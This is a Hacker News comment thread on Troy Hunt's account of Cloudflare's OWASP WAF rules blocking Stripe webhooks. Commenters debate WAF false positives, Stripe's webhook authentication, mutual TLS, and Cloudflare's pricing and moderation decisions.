Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Down the Cloudflare / Stripe / OWASP Rabbit Hole (troyhunt.com)
269 points by mdhb on Feb 20, 2023 | hide | past | favorite | 127 comments


This boils down to 'Cloudflare did something' and without the Enterprise plan you'd never be able to pull the data required to diagnose the problem. Oh also, Cloudflare knows they did something but plays the blame game until you get to someone that openly acknowledges that they know something is broken.

I've said it before and I'll say it again--Cloudflare is not making the Internet safer, its just making it less open. I know that is not the overwhelming sentiment of HN and me complaining about it isn't going to change anyones mind.


As a bit of a meta point it’s a bit astonishing how good Cloudflare is at PR and community management. The sentiment I’ve seen here in the past is overwhelmingly pro-Cloudflare. Every now and then they’ll publish a hit piece on AWS here and there’ll be an AWS hate thread, but no one seems to question Cloudflare’s motives for promoting bad press about their competitor directly to their target market.

Then again in most things, the underdog trying to upstage the incumbent is always a popular narrative. You’re right that talking about it likely isn’t going to change any sentiment.


HN is like any other community and is thoroughly captured by some hype machines (Cloudflare, the language that shall not be named) and virulently opposed to others (cryptocurrency)


What are you talking about? Java doesn't have a hype machine...


> it’s a bit astonishing how good Cloudflare is at PR and community management

It's really not, look at any cloudflare support thread here and how they crawl out of the woodwork for damage control because they failed in basic customer service

it's a huge red flag, and everyone in the comments always sees it.

cloudflare is cancer and needs to die.


> Cloudflare is not making the Internet safer

I am certainly not a fan of Cloudflare and woudn't use their services, but I think this is not an accurate statement. Their services do objectively provide a security benefit. The only question is really whether or not the cost/benefit ratio is favorable.


Only if you discount the impact on users who are blocked like those on VPNs, or myself because Cloudflare seems to dislike my ISP, and have no recourse.


That sort of thing falls into the "cost" category.


Yes, even considering this the benefits out way the costs. I use cloudflare competitor at my work. Ideally all APIs would never have security issues and always have amazing rate limiting. In practice, this is never the case. What I use stops low skilled attack on the scale of millions of malicious requests per day against thousands of false positives. (still way too high) In addition, when the high skilled attacker find a massive hole it also slows down them down so that they get thousands of requests in vs millions. In addition, it let you block them much faster than needing a new deployment and let have another way to detect them. Is there other ways to do this? Yes. By the time you implement everything will hackers stolen millions of dollar from your customers? Probably


Try getting a fresh IP from your ISP. I had a single IP that was blocked (incredibly annoying, and apparently impossible to have cloudflare fix it), but triggering a DHCP change caused me to get a good one.


They use CGNAT, having even a dynamic IP that’s all yours for a few days is sadly becoming a thing of the past as the IPv4 address crunch grows worse but Western ISPs and enterprises still procrastinate on IPv6 adoption.


Overall I agree with you - the only caveat I have to offer is Cloudflare's support of eSNI. My opinion on CF used to be quite black and white, but there is at least someone in there (for who knows how long) contributing to the actual security of the web. Not mutually exclusive with doing harm in other ways.


And don't forget, if they don't like you, they will happily deactivate your account with no notice and no reason given.


Bit hyperbolic, no? Maybe rephrase to "if you engage in Neo-nazi hate crime and promote real world harm, they'll deactivate your account after much internal deliberation on their role as gatekeepers and will publish a post with clearly stated rationale"?

I'm not advocating Cloudflare, but I do think we need to be fair when judging stuff like this.


"Let me be clear: this was an arbitrary decision. It was different than what I’d talked talked with our senior team about yesterday. I woke up this morning in a bad mood and decided to kick them off the Internet."

https://gizmodo.com/cloudflare-ceo-on-terminating-service-to...

Can you clarify where the "much internal deliberation on their role as gatekeepers" was?


The above comment is referencing the actions taken in 2022 against Kiwifarms; your article is from five and a half years ago; Cloudflare's internal processes have matured a lot in that time.

Moreover, its really worth driving the point home that Prince's point in that cherry-picked statement was to (dramatically) shine a light on the fact that he could do that. Cloudflare does not do that often; that's why it makes headlines when they do. Other tech companies do similar things far more often, daily in some cases. He, then and now, has been an advocate for abdicating responsibility for these decisions to governments. The issue, then and now, is that our government is woefully inadequate in keeping the internet safe. Threats coordinate at the speed of light and cross country borders; in the Kiwifarms case, the US government wasn't able to put together a case fast enough to keep Kiwifarms' targets safe. Also, I'm sure the public outrage in that case helped push a decision in one direction.


First, the phrase "cherry-picked" implies that something has been removed from a context which changes its meaning. The quote I shared was from an email that Prince sent, and if anything, the full context enhances the point I was making.

Second, the fact that tech companies "do similar things far more often" is not a good thing. Creating an internal committee and slapping the words "trust and safety" on it does not replace due process. These big tech companies are role-playing as governments, but they are terrible at it, and when they fail, they face no consequences.

As far as "government is woefully inadequate in keeping the internet safe," is that really what you want the government to do? How far should the government be able to do to enforce "safety"?


> These big tech companies are role-playing as governments, but they are terrible at it

If actual governments did it, they wouldn't have to. I bet they'd be thrilled to be relieved of that responsibility.

> As far as "government is woefully inadequate in keeping the internet safe," is that really what you want the government to do?

Someone has to do it. I'd rather it be done by a government, who have to pay at least some attention to public sentiment, than by major corporations, who do not.


I think we may have a different view on what the purpose of a government is. Would you be ok with the military forcefully entering a tech company, pointing guns at the employees, and forcing them to do something? Because in my opinion, that is precisely what the law does, in an abstracted sense.

Also, I have absolutely no interest in a government keeping people "safe." That sentiment only leads to license for governments to violate privacy and control the lives of private citizens.


> I think we may have a different view on what the purpose of a government is.

Perhaps. I also suspect that we have a different view on what government actually is.

> Would you be ok with the military forcefully entering a tech company, pointing guns at the employees, and forcing them to do something?

I think representing all actions of government as being the equivalent of this is reductionist to the point of absurdity.

From my point of view, there will always be (and has to be) rules about how we interact with each other. The question is who will develop and implement those rules. Call it a necessary evil if you wish.

I prefer those rules be developed and implemented by us, collectively, because then we have at least some amount of influence over the process. If it's not done that way, it will be done by powerful entities such as corporations (or, in a maximally degenerate situation, warlords or mobs), where we have little to no influence over the process.


Your description of what happened is a bit hyperbolic as well. I remember this event, but the details are pretty fuzzy. IIRC, it stirred up so much controversy precisely because no US laws were broken. So saying "engage in Neo-nazi hate crime and promote real world harm" is inaccurate. The content was garbage, no doubt about it. But let's not get hyperbolic in the other direction either.


> no US laws were broken

People keep confusing private organizations and governments. They don't need to break any laws to become undesirable customers, and any private company that tolerates these kind of customers does so at their own discretion. The world doesn't owe them a right to be awful people, but they can still be awful if they accept the consequences.


The problem I have with CloudFlare is that their definition of "undesirable customer" includes forums engaging in hateful, virulent, but ultimately legal speech, but does not include forums that are selling methamphetamine and stolen credit card numbers.


I'm not confusing anything. Cloudflare's stance was that they'd serve anything that wasn't illegal, and one day they decided to change that. Of course that's their prerogative, but I'm just explaining why it stirred up so much controversy.


"no US laws were broken" != lacking in harmful activities.


I don't think "happily" has the right implications for an action they have taken three times ever.


Source?


> Cloudflare is not making the Internet safer, its just making it less open.

They're doing both, eh?

I switched my family's home DNS to Cloudflare's family-safe DNS ( https://blog.cloudflare.com/introducing-1-1-1-1-for-families... ) to protect them from malware and porno (I'm not a prude, they don't use the Internet for that (no really! We are weirdos.) and porn sites are often a malware vector anyway.)

A few months ago I noticed that you can't browse weed stores through their DNS anymore.

I don't really blame them, I'm assuming it's due to pressure from the US Federal Gov. (who still consider pot to be some insanely dangerous narcotic!) But it was definitely a personal "until they come for you" moment.


This sounds like perfectly reasonable behavior, not needing any pressure from government agencies.

I would assume that anything purporting to filter the internet to be "family safe" would exclude weed stores, as well as liquor stores, tobacco stores, and anything else that most people would consider inappropriate for children.


Well, that's as may be, but it says on the tin "malware and porno" and weed is neither, eh?


Liquor stores? In multiple states every grocery store is a liquor store…


Cloudflare isn't really to blame here when the customer has FULL control over all security settings - they can define rules as they please, and have all the tools (including the API) to do this


Huh? In this case, CloudFlare updated the OWASP ruleset, causing Troy's payments integration to break.

That's not nice DX in my opinion.


Customer should be aware that they are relying on Cloudflare defined rulesets and should understand that they change


This sounds like victim blaming honestly. If Troy Hunt, one of the most well known security researchers around and who's been running HIBP for almost a decade now ends his blog post with effectively a shrug saying "I dunno what happened" how is any reasonable customer who doesn't have access to the Enterprise plan supposed to debug any of this especially when Cloudflare themselves barely admitted fault? They even tried rolling back the OWASP ruleset and it didn't change a thing. He had to manually add the exceptions to the firewall. This is arguably terrible DX


I feel like Cloudflare could do a lot better at letting the customer know they are using rules managed by them and how that affects their traffic. But at the end of the day, enterprise customers should be experts at this (and in many cases have people employed whos job is literally for this) - and they have all the tools available to them


If even Cloudflare admits the error and doesn't even know what triggered it and hadn't fixed the error by the end of the post (which required manual intervention by Troy to bypass), I genuinely don't understand how you expect "experts" to deal with this. This just feels like a non-sequitur


See also: Cloudflare in front of Mastodon.

A lot of naive Mastodon admins are putting default Cloudflare configurations in front of their instances. The problem is that inter-instance requests necessary for federation then get caught as bots (because they essentially are) and connections in the network degrade, causing eventual de-federation.

Cloudflare is magic, in the good and bad ways. I'd only use it for very small personal sites or things that can afford downtime and don't need integrations, or for large businesses that can afford the enterprise plans and will actively manage the account and respond to business and tech needs with config changes.


Are there any public reports of this? It’s not something I’ve seen anywhere and not my experience. I “googled” it and all that came up was your mastodon post saying the same thing.


I wonder if their Wildebeast ActivityPub implementation will have similar issues.


"very small personal sites" don't need Cloudflare.


Any site should be able to survive DDOS.


With which strategies would "any site" survive DDoS without paying Cloudflare or some other middleman?


That was my point.


Most small websites will never get attacked.


What I find bleak about the situation, is that it is a glaring design-fail, even though everyone involved should have the necessary expertise to do better. A callback from your payment provider should never go through a best-effort WAF. Instead, as you already have a strong business relationship, you could easily exchange/store/configure strong credentials with stripe [1]. When even a security professional doesn't do that, what does it say about the state of documentation of this feature?

Looking at the documentation directly, what they advise you to do is kind of the worst idea they could come up with: https://stripe.com/docs/webhooks/signatures – you need custom logic[2] to verify that their MAC ("signature" they call it incorrectly) is valid and you need to configure a different secret for each of your endpoints. And then you still need to handle replay attacks somehow, which is its own nightmare to do correctly. It's no wonder the WAF can't do that for you.

From a few years old personal experience, I'm really irritated by stripes web-hook approach overall. Payment process information is such a vital business concern that "let's try to call them and if that fails... well we tried" is broken on principal alone. The obvious approach is to have an event list which you as customer long-poll or just poll every few seconds if your framework doesn't support async well. This is also trivial to do securely: You're HTTPS library already authenticates stripe during the TLS handshake and that is all that is necessary.

[1] Best case scenario: Let stripe authenticate with mutual TLS, but I know this is quite a long way away from typical web server configurations.

[2] Stripe's approach very much reminds of DPoP https://news.ycombinator.com/item?id=31266575 which shall in now way be construed as a compliment.


I just would like to give my opinion on some of your points, which I don't agree with:

> Looking at the documentation directly, what they advise you to do is kind of the worst idea they could come up with: https://stripe.com/docs/webhooks/signatures – you need custom logic[2] to verify that their MAC ("signature" they call it incorrectly) is valid and you need to configure a different secret for each of your endpoints

It certainly help that I use their official SDK, but it's one line of code to add the signature validation. Also, I'm not sure why you would want to create a lot of endpoints to listen to these webhook. I simply have one, and the Stripe SDK helps me in determine the event type, its deserialization, etc.

> Payment process information is such a vital business concern that "let's try to call them and if that fails... well we tried" is broken on principal alone

That's not how it works. The webhooks keep retrying with exponential backoff until they succeed. You can also manually retrigger them for individual events.

> The obvious approach is to have an event list which you as customer long-poll or just poll every few seconds if your framework doesn't support async well

Nothing is preventing you to do that. In fact, in my codebase I do polling to the Stripe API as a fallback to check if payment is successful in case there are issues with webhooks. But it's nice to have the webhook telling you immediately if a payment fails/succeed, in order to give feedback to the user fast about the status of his payment (and not wait the next long polling iteration)

Not everything on Stripe is perfect, but I do find it really pleasant to work with in general


Thanks for your remarks and corrections.

While what you say is correct, it doesn't apply to the problem Troy Hunt faced. What he needs is DDOS protection on his API. The request authentication Stripe provides is too complicated to be checked by the web application firewall.

The (edit:) pragmatic approach is to

a) not use webhooks or

b) let Stripe connect to you via HTTPS (to prevent replay attacks and leakage of the secret URI), give Stripe a secret URI, whitelist the secret URI in the WAF and verify the payload MAC via the official SDK.

> in order to give feedback to the user fast about the status of his payment (and not wait the next long polling iteration)

Nitpick: The long poll / Server Sent Event should respond immediately once there is new data available, so it should not be slower than the webhook.


> b) let Stripe connect to you via HTTPS (to prevent replay attacks and leakage of the secret URI), give Stripe a secret URI, whitelist the secret URI in the WAF and verify the payload MAC via the official SDK.

IMHO the long term best architecture would be HTTPS client certificates / mutual TLS auth- you would just whitelist that only clients signed/approved by Stripe can connect to that Stripe-callback endpoint.


Maybe but the feasibility takes a huge dive, because you now need the application to terminate tls (or additional configuration for the route wherever TLS is terminated), plus a flow to rotate certificate.


From memory, I think that's how Twilio callbacks work.


> The obvious approach is to have an event list which you as customer long-poll or just poll every few seconds

This is also much much easier for the payments integrations developers to test, compared to all the messing about and running dodgy proxies that testing webhooks involves.

Webhooks for critical application paths just seem like a bad idea all around really


> Webhooks for critical application paths just seem like a bad idea all around really

Well, put. I've been deep in the Stripe API for a while now, and the invoices API provides up-to-date account status information and what a customer is paying for. This can be referenced as needed and, if desired, cached with some TTL and referenced as the "truth." Then webhooks can be viewed as a convenient way to bust the cache quicker than waiting for the TTL to expire.

It could be better, but it provides the necessary information without relying on webhooks.

An example of how we use this API as a form of entitlement checks at Tier can be found here: https://github.com/tierrun/tier/blob/f7c32426d30ca314706ca7e...


You should not poll a payment provider in a general flow. Do you realize how many requests that will cause if everybody did that? A payment flow is event-driven by nature. The payment provider pushes the states back to the initiating system. If that fails it is up to the consumer to detect problems and make sure that the system is in sync with the provider. Some payment providers do push data up to at least 24h. It is an obvious design flaw...


Yeah, Stripe is well documented but very ugly to actually handle in practice.


There are multiple places where he uses a feature only available to enterprise users (read: Not me) to resolve this. I guess the "normal" thing here would be to disable the WAF and be done with it.


This jumped out at me too. Cloudflare keeps many diagnostic and debugging tools available only on the Enterprise plan (typically >$3k per month). When something like this happens to most small teams and startups, they are working in the dark even on the Business plan at $200/mo.


FWIW CloudFlare has worked with us time and time again to get pricing in line with our expectations. We have numerous "Business Plus" or "Free Plus" plans across various accounts and zones that include features that are, as listed in the marketing, only available to Enterprise.

Just reach out to someone at Cloudflare. I'm sure they'd love your business.


And WAF isn't the only design option for webhooks. WAF = define what to block. Another options is to define what to accept (block all else by default).

OpenZiti approach (1) for example:

a. enroll each side of the webhook w/ X.509 identity

b. X.509 gates a network overlay between the servers

c. each server initiates outbound sessions to the overlay

d. block everything else (deny-all inbound on both servers)

(1) disclosure: i am a maintainer of the openziti foss, and you can only (fully) use the technique above if you have enough control of both sides, e.g. use a Lambda function: https://blog.openziti.io/my-intern-assignment-call-a-dark-we...


Mutual TLS auth seems like such a no-brainer for APIs like these.

I do wonder, though, how does OpenZiti deal with client certificates expiring? Do you not set/enforce an expiration date or do you have some kind of automated renewal mechanism?


your overlay network fabric infrastructure - ziti edge routers - leverage the ziti edge client API to submit CSRs for new certs x days before expiry.

for client endpoints, there are currently 2 choices and at least 3 in the future:

1. admins chooses to enable client endpoints to continue to auth with expired client certs. the admin revokes access (when necessary) at an endpoint level or at a service level (least privileged access) via those constructs, rather than cert constructs.

2. admins don't permit expired certs to be used. the admin is managing the certs.

3. as a third choice for client endpoints, ziti has plans to enable admins to use the API used by the fabric infra mentioned above. this is future, with timing mainly dependent on openziti community priorities and related work.


Cert renewal is why it's not used everywhere, I think. While OAuth2 / client credentials is complicated, at least .jwks endpoints make cert rotation easy.


yes, can be tricky, as you state. see above for the openziti approach.


The problem is that you hope this doesn't encourage the developers to lapse on RBAC and let an authenticated client do everything.


absolutely. in the case of openziti, the x.509 is the first authentication gate (optionally paired with ziti posture checks and mfa). everything from there is least privileged, attribute-based access, at a service level. default is closed - access to no services (even if authenticated at the level of the private ziti network fabric overlay).


Yeah, while I would have tried to investigate this a bit, this seems to be an issue on Cloudflare

Bypassing the rules is a workaround, but not a fix


And if you have to disable WAF, what exactly is Cloudflare doing for you?


Even with the WAF disabled (at least as much as I can disable it without the Enterprise plan, i.e. "Essentially Off"), I've found it will still block legitimate requests. Tainted CGNAT or dynamic IPs are my guess.

The WAF doesn't really matter for my use case as the route is handled by a CF worker, in fact I'd prefer it doesn't get in the way.


Edge Cache with unmetered egress?


unmetered up to a point, but yeah. Also network-level DDoS protection


If you are reaching the point where they are sending you emails asking about what you are doing, you should be paying for it.


In the article, the author disables the WAF only for Stripe outbound IPs, which can be presumed to be safe (unless Stripe's machines/IP space gets hacked). The WAF still works for traffic from all other IPs


yeah, but sadly there aren’t many CDNs that offer WAF, even the most basic one. I literally begged bunnyCDN to build one so we can switch from CF. It’s on their roadmap for like forever.


Would it still do DDOS even without the WAF?


Our DDoS mitigation is separate yes and will still work.


I wonder what the take away from this is? The simple one is "bad cloudflare" or "bad stripe" or even "bad hibp". Or maybe all in conjunction. Or maybe none.

But that seems simplistic to me. The smell of this is a system that is so poorly made that it has layer upon layer of obscure hacks to protect it. It appears that no one can understand why this happened and the best guess is that it had something legitimate that was misunderstood. Maybe the word "alter" and "table"? This is the equivalent of you walking into a bank, telling the person "Hi my name is Rob and I came to the bank today to ..." And then the bank goes into automatic shut down.

This is broken. IMHO.


From the information given, bad Cloudflare. These kinds of content-matching rules should be triggering deterministically, and testable in a hermetic test environment. They also have sample payloads that get blocked vs. ones that gets through, despite being essentially identical. It should be about as easy to debug as it gets.

That it's tricky to debug suggests there's something totally different just badly understood rules. Maybe a server with a hardware fault that's making it return bogus results (though that should be easy to find in monitoring), maybe some kind of race condition, or running of different rules in parallel + having global or request-scoped state such that the order in which the rules finish running matters.


From someone else in the article's comments:

> if we treated the customer's phone number as a hex representation of ASCII, it spelled something that was recognisable as a command.

And the WAF team suggested they ask the customer to change their phone number.

Goodness me.


Case 1. It blocks my SQL playground due to SQL injections: https://play.clickhouse.com/play?user=play

- solution: disable WAF.

Case 2: It damages my presentations by removing whitespaces in HTML elements styled as "white-space: pre" at https://presentations.clickhouse.com/

- solution: disable auto minification.

Case 3: It makes the debian packages repository inconsistent https://packages.clickhouse.com/

- solution: disable caching.

In fact, Cloudflare is an amazing service - it is powerful and easy to use, you only have to take care when enabling and disabling its features.


This is absolutely not the first (or second) time I've seen an outage triggered by a well-meaning security rules update on a WAF.

To be honest, a lot of security-related deployment processes would be regarded as unacceptable, wild-west level shit if they occurred in the software lifecycle - like difficulty to identify that a change had even occurred, inability to see before/after for the change, release processes effected manually via consoles, change deployed directly to production without going through a lower environment, and big-banged as opposed to canaried etc. etc.


> About Page: “I'm Troy Hunt, an Australian Microsoft Regional Director and Microsoft Most Valuable Professional for Developer Security. I don't work for Microsoft, but they're kind enough to recognise my community contributions by way of their award programs which I've been a part of since 2011.”

Can someone explain what this Microsoft Regional Director role is because it sounds like he works for Microsoft but then says he does not.


Microsoft Regional Director is effectively someone who is an advisor to Microsoft - https://rd.microsoft.com/en-us/about/ .


That's a really stupid choice of title for essentially a "Key Partner"


Ignoring the question of who is actually doing something wrong and the fact that most customers on lower tiers wouldn't even be able to get most of the presented information, it seems absurd to me that a customer on an Enterprise plan that costs thousands of dollars a month can't get a simple "this is why those requests trigger the firewall" answer from CloudFlare. The diff between the request that passed and the one that triggered the rule is simple enough and the WAF is not some opaque AI I hope.

Why can't the triggering request be replayed through the WAF with output that shows the scores for each bit?


My first thought is - why is this traffic going through CloudFlare at all? There's no caching benefit and it's all going to be coming from a datacenter anyways.

Maybe it's more trouble than it's worth to bother setting up a separate non-CDNed DNS for API routes for this particular site. But then how much time was spent trying to sort out why those requests were being blocked?


Cloudflare blocks denial of service attacks, too, which is probably important for tools in the security space, and blocking denial of service attacks means making sure that attackers don't know how to bypass Cloudflare and hit your origin directly.

If you let things go direct to the origin, then you're giving away information about where the origin is, even if the things are only Stripe.


That's true, but it seems pretty low-risk to me, since only Stripe and maybe a few other services you're integrating with actually know the DNS name. It's possible someone could discover it and attack it, but I think I'd wait to see an attack actually happen that couldn't practically be mitigated otherwise before moving it behind Cloudflare etc.


I've been running the OWASP coreruleset in production for about a year now and it has been a big pain. The way I made it manageable was 1) training users that "if you see a 403 error, tell me ASAP" and 2) learning the ModSecurity rule syntax to be able to create rule exceptions for users very quickly. This is not possible to do at Cloudflare's scale.

Even then, users who didn't know the intricate details of the Web Application Firewall (like Troy in this case) would waste hours hunting down the issue. Since less popular sites often have more illegitimate traffic than legitimate traffic, there was really no good way for me to proactively fix WAF issues.

The conclusion I have drawn is that WAFs really only have a few very narrow use-cases.

The main use-case is when you want to write your own rule to protect hosts from a specific zero day while they are being patched. Like a simple rule to detect Log4J [1] was an effective band-aid while we scrambled to implement real patches. But WAFs have an inherent weakness: clever attackers can pretty much always circumvent rules, or force to you write a rule that is so complex that it causes slowness or blocks legitimate traffic.

Another use-case is when you have to deploy some untrusted code that is likely vulnerable to common (>1 year old) vulnerabilities. Like running an old/archived wordpress instance. This is the only time when the coreruleset makes sense IMO.

As I see it, WAFs are a tool created in a simpler time when the number of possible attacks and applications was small. In the modern era where there is a constant deluge of zero-days, huge attack surfaces, tons of variability in applications, and lots of sites where RCE/SQLi is a feature (think CI job definitions, Juptyer notebooks, custom query languages), WAFs have lost their effectiveness.

[1]: https://github.com/coreruleset/coreruleset/issues/2331


We whitelisted the stripe IPs completely after getting burned once. If Stripe gets hacked so that the hackers jump off to our site, we have far bigger problems to worry about.


It seems like Cloudflare should be doing this for you. It wouldn't be hard for them to keep a list of IPs from common known-good integrations. They could prompt on first hit to ask you if you want to allow-list those companies, or even just do it by default.


Can you imagine the firestorm that would happen if CF was found to be allowing traffic from certain other entities, no matter how trustworthy they're perceived to be, to bypass security controls by default? And the firestorm would be entirely warranted.


I see your point, but I think there is a version of this that would be fine. I imagine these rules would be shown in the product so users can see the configuration and override it, perhaps it's an explicit opt-in, perhaps there's a public application process for inclusion or some sort of stated conditions so that it's not seen as too political which services are chosen... there are lots of options.


I agree. I was really responding to having such a pass be enabled by default. The defaults for any security system should be toward maximal security. Users being able to loosen the rules to fit their situation is fine and desirable.


Running a WAF with a dynamic ruleset between you and your payment provider seems a bit risky to me.


Using a third-party's WAF and trusting it will not log your data also shows some risk.

By centralizing all data going through the web you paint a massive target on yourself (for black hats).


WAF blocking things randomly isn't a good look for Cloudflare. I wonder how many outages this has caused for their customers.


From my experience randomly blocking rules in WAF is essentialy a feature of the WAF. I have random issues with WAF all over the places from random providers on different projects.

And yep. Disabling WAF were always a good enough solution untill we figure out which of the request parts are triggering rules


I’ve generally thought that POST we hooks are the wrong abstraction for this type of payment confirmation, and reading this makes me believe it even more:

This whole process needs something like a message queue. Stripe should publish and event to the queue, and HIBP should receive that event. A message queue is still subject to network failures, but any sensible implementation will notice and recover missed events.


The queue/DLQ in this case is on Stripe's end. Once the WAF problem was fixed, Stripe ran the webhooks correctly.


With a real queue, dropping one message on the underlying transport will either be detected quickly and obviously on both ends, or will be recovered automatically, or both.

The implementation could be as simple as a queue id and sequence number in the POST along with a way to request replay (via GET to Stripe) of old messages indexed by the same id and sequence number and a way to periodically ask for the latest sequence number.


Damn this is absurd. Is there not a way on Clouldflare to flag webhooks with a "if request contains this api key, let it through, block the rest"?


It looks like "WAF - add exceptions" supports Wireshark style expressions, so there's things like:

(http.request.uri.query contains "some-string")

Or similar for checking headers, post body content, etc.


You can create custom rulesets, which is what the article's author did. This allowed the API calls to essentially bypass the WAF.


just remember sometimes cloudflare add new features which aren't controlled by existing rules

"security off for this ip?" "I guess you don't mean our new shiny feature!"


"I look at the managed WAF Cloudflare provides more favourably than I did before simply because I have a better understanding of how comprehensive it is. I want to write code and run apps on the web, that's my focus, and I want someone else to provide that additional layer on top that continuously adapts to block new and emerging threats. I want to understand it (and I now do, at least certainly better than before), but I don't want managing it day in and day out to be my job."

My takeaway from this is actually that you can't just have a managed WAF that gets out of your way. This looks like it took easily a day or more of work. What's the advantage of using a CloudFlare "managed" WAF versus running your own within AWS? I guess the "infrastructure" is managed, but the operations isn't...

I'm a pretty experienced engineer, and I honestly don't know if I'd have been able to solve this issue personally. Most likely I would have just whitelisted all of Stripe's IP's, like the initial hotfix did.


Working around WAFs for years in enterprise support this kind of crap happens all the time. In my current work we'll have a client try to access our app in some way that oddly explodes. In general a browser HAR file is very useful. Then we have to check our app (hosted on the customer's servers), then we'd have to look at the load balancer, and when that doesn't bear results it's quite often we find a WAF in network path. Most of the time it's near impossible to find the team that manages it and then get helpful information out of them about the issue.


It's like complex systems have complex failure modes, who'd thunk?


I have used a few different WAFs to date, AWS WAF, CloudFlare WAF and Akamai WAF. I have had issues with all but usually the frequent issue is an unexpected blocking of request. Would be interesting to benchmark a set of WAFs to see which ones block threats vs which block valid traffic.


A funny one that comes up is many WAFs either block, or only examine the first X bytes of large-sized post requests, for performance reasons.

So your choice of unpredictable lost requests, or a loophole where the WAF is blind.


Came across similar situations before [beyond previous issues with being a trusted bot by Cloudflare]

The destination website user was wondering why our service didn't visit their website and why we were receiving 503s in return, with CF in the middle. Turns out in this case it was an additional bot blocking service they'd installed on their own server, which I'd presume is hard for them to debug if the request never reaches them (but in this case it did, just added confusion for them).

Far from ideal to have a middle man arbitrate a web request or decide what is trusted. On the flip side, lots of rogue traffic that should be blocked. Think in some cases the WAFs are just a bit too aggressive with the grey area and UAs they don't know. It creates a barrier of entry to new players.


Definitely Stripe should have done a better job here. However, also points to the risk of allowing service providers to handle your security. Maybe there should have been a back test and or a "maker" "checker" control for pushing new security rules.


Cloudflare is blocking the shit out of legitimate requests, how is this Stripes fault?

Putting the webhook callback behind CloudFlare was the mistake IMO.


Yes - Stripe is even nice enough to provide a list of IP addresses their webhook requests could come from [1]

And Cloudflare is well known for randomly throwing up "Checking your browser before accessing example.com" interstitials and captchas and suchlike - of course you don't want bot detection on your callback API.

[1] https://stripe.com/docs/ips?locale=en-GB#webhook-notificatio...


A customer I work with has a large Drupal site hosted with a big time Drupal provider. Cloudflare has decided that image uploads from the browser via the JS uploader needs to be checked and injects itself into that...but the browser has no way to display it so the page just hangs. Its awful.


Indeed, in the end Troy disabled a certain rule for incoming requests from Stripe but not all. Just before publishing the article he discovered more (webhook) requests being blocked by a different rule. This seems like a continuous source of issues where valid (webhook) requests are being (arbitrarily) blocked. Why wouldn't you just disable all rules for requests coming from Stripe?


Cloudflare is a white elephant in my current org. We are probably paying a lot to them and we are having issues that would be easy for me to fix if I was running my own deployment anywhere else but the platform team doesn't seem to know how to config things or don't care about it. So I end up with complaints from the business team that I can't action upon because the setup is obscure and the few parts that I can see and manage are poorly documented and I'm not even sure which feature is supported by the company's plan. My org is at fault but I doubt this is an exception.


I solved the stripe webhook issue for https://pinggy.io by adding a refresh button that calls the stripe API to double check all subscriptions for a user.


I'm not expert and this was really nice and easy to read and understand. Thanks for sharing Troy.

Question: Should we even use Cloudflare for server-server communication such as webhooks, API calls etc?


If your API calls are so generic that you don't need to identify the caller using an API key or some other token then you might be able to get some mileage out of it. But personally I'd like all API calls to go to my servers and not someone else's. If only because I don't like 3rd parties having the ability to log the payloads of requests, and whoever terminates your SSL connections has the ability.


Suppose I use Stripe in a similar way to HIBP and a customer comes along just as my server has gone down, would Stripe try again later? I think it should wait a little while but I'd hope it'd automatically try again later as long as there's data that needs to be sync'd but isn't yet.

I can maybe imagine 403 being a "Don't try again" signal in a way that 500 or timed-out isn't.


Yes, it retries for up to three days according to documentation: https://stripe.com/docs/webhooks/best-practices#retry-logic


If it doesn't you can manually re-trigger it. That does require you to monitor it of course.


I had the same issue with one of my sites. I activated CF owasp ruleset and all hell broke lose (it took a while to backtrack, aka down the rabbit hole I went). I deactivated it and the problems remained. It took several hours before things were back to normal. All in all - CF is too big now, they want to have ALL the features, but the only feature I want is DDoS protection…


We had a very similar issue recently but with s3 presigned url uploads, cloudflare WAF and OWASP rules.

Worked fine one day on 'high', next day started blocking random file uploads with a 'blocked by cloudflare page'.


I guess things like this is why CF added the traffic sequence section in the portal. Another thing on the same theme is that the DDOS rules are the first in line...


I wonder what is actually causing the error here. Looking at the 2 payloads diff on the site I can't spot anything. It's a weird one that's for sure.


Something real subtle probably, like enough of the redacted areas accidentally containing something like looks like SQL. Like WALTER contains ALTER, CASEY contains CASE, etc...enough to add up the score to fail.

Hopefully more convoluted than simple substring matches like that, but I've seen WAFS do that. If it is adding up substring matches, there is stuff like "subscription_update", "null", "created", "discountable", "total_count", etc, that would set a high floor.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: